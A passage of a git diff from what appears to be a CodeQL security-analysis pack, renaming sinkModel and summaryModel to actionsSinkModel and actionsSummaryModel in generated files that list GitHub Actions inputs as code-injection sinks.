actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43745006f8d..43cc1e0187e 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 9289afb744f..7c80b7e6eda 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9729f966813..1f7b69e6254 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 92c25953944..7879a7903b4 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index c572c11ada4..dbbd4c720ca 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index 1819f4f716e..f99698b1992 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index 620100dd2d9..a98a135d6b4 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index dfb08d26058..3ebb5e7acb3 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index a99ccc9e477..b26aa6ea48b 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 3a1e7b9d336..683965e13d2 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index c15c1fac006..9358c895f3c 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index b0c787fa378..8233e506603 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 86278889fdf..2aea730db7e 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 4bf92a25123..b03d2391882 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 79c13504fab..9db70f02db4 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 45ac61c8ef9..8cea15ac9e1 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index ce546fceb4b..766ec515551 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index b34c6d46da3..13ee2f4e7a8 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index f87e0c02529..0cf05c2273b 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 88348f05cd0..7f2622feecd 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 76fe3bed472..3aa8c3bc649 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index bf1a498d7a0..b79317db9c8 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index b985d87f7e1..843e0d20b98 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 8e7cdd0308c..2a0fd3ac371 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index cf30d0d19cc..3ef29cc9b84 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 5414a755179..71d2012eb02 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 97a3bfa026e..a67aeb90595 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 81672e85557..1f5dd108f91 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b4fdfaf273d..ea4a2a2a3c7 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 6f1043073d8..29973ccdbd7 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index f9244c44858..2db70ffea66 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 36332c5678d..8a4273e8caf 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index c246e5de06f..de09b35f1d4 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 13c0093fe4a..91e6268e614 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 49b226de1e8..777212d9a0a 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 9a6e0b88ba2..8cc0ab83a42 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 4f88855a561..f1244bdd5de 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 5683d28567f..37814510c8c 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 424c7241bcf..48e40c36bea 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 37295f2cf6c..0edb2c5f8cd 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index e7c767d2dce..61210d17abb 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 7f78690f639..22dc1a40629 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index ba1beace170..b2888b571a8 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index 63085c045d0..bc188d91f1b 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d6ee6c8bb7d..d5defe67401 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 83951f43c63..d97fedbed13 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 397ab083809..e22c29b09f1 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 023abac3631..7203bb8345c 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 5dd069df499..dcfbb0ea203 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] diff --git 